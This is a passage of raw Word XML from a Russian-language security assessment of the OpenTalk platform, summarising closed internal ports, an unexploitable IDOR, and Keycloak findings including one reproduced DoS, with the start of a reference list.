    <w:p w14:paraId="260AC587" w14:textId="77777777" w:rsidR="008D0061" w:rsidRPr="00C54DEE" w:rsidRDefault="008D0061" w:rsidP="000534E5">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581F9BE2" w14:textId="79FBD656" w:rsidR="008D0061" w:rsidRPr="008D0061" w:rsidRDefault="000534E5" w:rsidP="008D0061">
      <w:pPr>
        <w:pStyle w:val="130"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000534E5">
        <w:lastRenderedPageBreak/>
        <w:t>Веб-интерфейс</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913F4E0" w14:textId="3C7DCF7C" w:rsidR="008D0061" w:rsidRPr="008D0061" w:rsidRDefault="008D0061" w:rsidP="008D0061">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0061">
        <w:t xml:space="preserve">Перебор идентификатора комнаты </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="008D0061">
        <w:t>IDOR</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0061">
        <w:t>невозможен, так как</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="008D0061">
        <w:t>room</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="008D0061">
        <w:t xml:space="preserve"> ID</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="008D0061">
        <w:t>генерируется</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0061">
        <w:t xml:space="preserve"> как UUIDv4, что обеспечивает 122 бита энтропии и делает перебор вычислительно неосуществимым.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A6592" w14:textId="77777777" w:rsidR="008D0061" w:rsidRPr="008D0061" w:rsidRDefault="008D0061" w:rsidP="008D0061">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F7D495" w14:textId="18D79B83" w:rsidR="00D87C91" w:rsidRDefault="00D87C91" w:rsidP="00D87C91">
      <w:pPr>
        <w:pStyle w:val="130"/>
      </w:pPr>
      <w:r w:rsidRPr="00D87C91">
        <w:t>База данных, очереди и хранилище (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D87C91">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D87C91">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:t>Rabbit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87C91">
        <w:t>MQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D87C91">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D87C91">
        <w:t>MinIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D87C91">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD009D4" w14:textId="528AFE86" w:rsidR="00D87C91" w:rsidRDefault="00D87C91" w:rsidP="00D87C91">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D87C91">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Все порты этих компонентов открыты только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">в локальной сети </w:t>
      </w:r>
      <w:r w:rsidRPr="00D87C91">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">и недоступны снаружи. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240EE6E" w14:textId="77777777" w:rsidR="000534E5" w:rsidRPr="000534E5" w:rsidRDefault="000534E5" w:rsidP="000534E5">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50250532" w14:textId="77777777" w:rsidR="007C5AB5" w:rsidRPr="00C82B97" w:rsidRDefault="007C5AB5" w:rsidP="007C5AB5">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00C82B97">
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F99470" w14:textId="1997B1EE" w:rsidR="006042B3" w:rsidRDefault="006042B3" w:rsidP="006042B3">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты анализа безопасности программного обеспечения </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">показали, что </w:t>
      </w:r>
      <w:r w:rsidR="001A06E7" w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>внешняя поверхность</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаки платформы ограничена. Единственной точкой доступа извне является </w:t>
      </w:r>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на порту 443, а к большей части </w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">контейнеров </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Rabbit</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>MQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>MinIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>LiveKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступ возможен только из внутренней сети. Это подтверждается результатами анализа сетевых протоколов и списком открытых портов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203EDC92" w14:textId="7C8DAC63" w:rsidR="001A06E7" w:rsidRDefault="006042B3" w:rsidP="006042B3">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Наибольшее количество уязвимостей было обнаружено в подсистеме аутентификации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> которая является единственным компонентом платформы</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A06E7" w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">с логикой обработки </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OIDC-токенов</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Из </w:t>
      </w:r>
      <w:r w:rsidR="001A06E7" w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">построенных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>цепоч</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>к эксплойтов «1-day» удалось воспроизвести только одну. Это была атака типа «отказ в обслуживании» CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>2026-9803</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, которую можно было осуществить без аутентификации и дополнительных предварительных условий, что представляет собой реальный и подтверждённый риск для доступности всей платформы. Вторая цепочка</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>повышение привилегий посредством обмена токен</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">ов, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>осталась теоретической. Настройки</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A06E7" w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>конфигураци</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7" w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7" w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> препятствуют</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> практической реализации этого сценария.</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">При проверке других подсистем серьезных уязвимостей обнаружено не было. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5592FFFA" w14:textId="0914C31C" w:rsidR="006042B3" w:rsidRDefault="001A06E7" w:rsidP="006042B3">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">результате </w:t>
      </w:r>
      <w:r w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">ПО </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>демонстрирует достаточный уровень защищённости на архитектурном уровне</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">корректная сетевая сегментация и </w:t>
      </w:r>
      <w:r w:rsidRPr="001A06E7">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>продуманная модель компонентов ограничивают большинство рассмотренных векторов атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0651B9C8" w14:textId="77777777" w:rsidR="006042B3" w:rsidRDefault="006042B3" w:rsidP="006042B3">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B6FD11" w14:textId="77777777" w:rsidR="006042B3" w:rsidRPr="006042B3" w:rsidRDefault="006042B3" w:rsidP="006042B3">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D485CB" w14:textId="52F6DAD4" w:rsidR="006042B3" w:rsidRPr="006042B3" w:rsidRDefault="006042B3" w:rsidP="007C5AB5">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r w:rsidRPr="00156A96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Список использованных источников</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD743D7" w14:textId="4ABD6571" w:rsidR="00545F50" w:rsidRPr="00545F50" w:rsidRDefault="00763E44" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Ref234290763"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:t>Rabbit</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72">
        <w:t>MQ</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> официальный репозиторий.</w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>github</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>com</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>rabbitmq</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>Rabbit</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>MQ</w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50524787" w14:textId="1EA1F70B" w:rsidR="00545F50" w:rsidRPr="00545F50" w:rsidRDefault="00763E44" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F04CB">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">официальный репозиторий. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>github</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>com</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>keycloak</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>keycloak</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
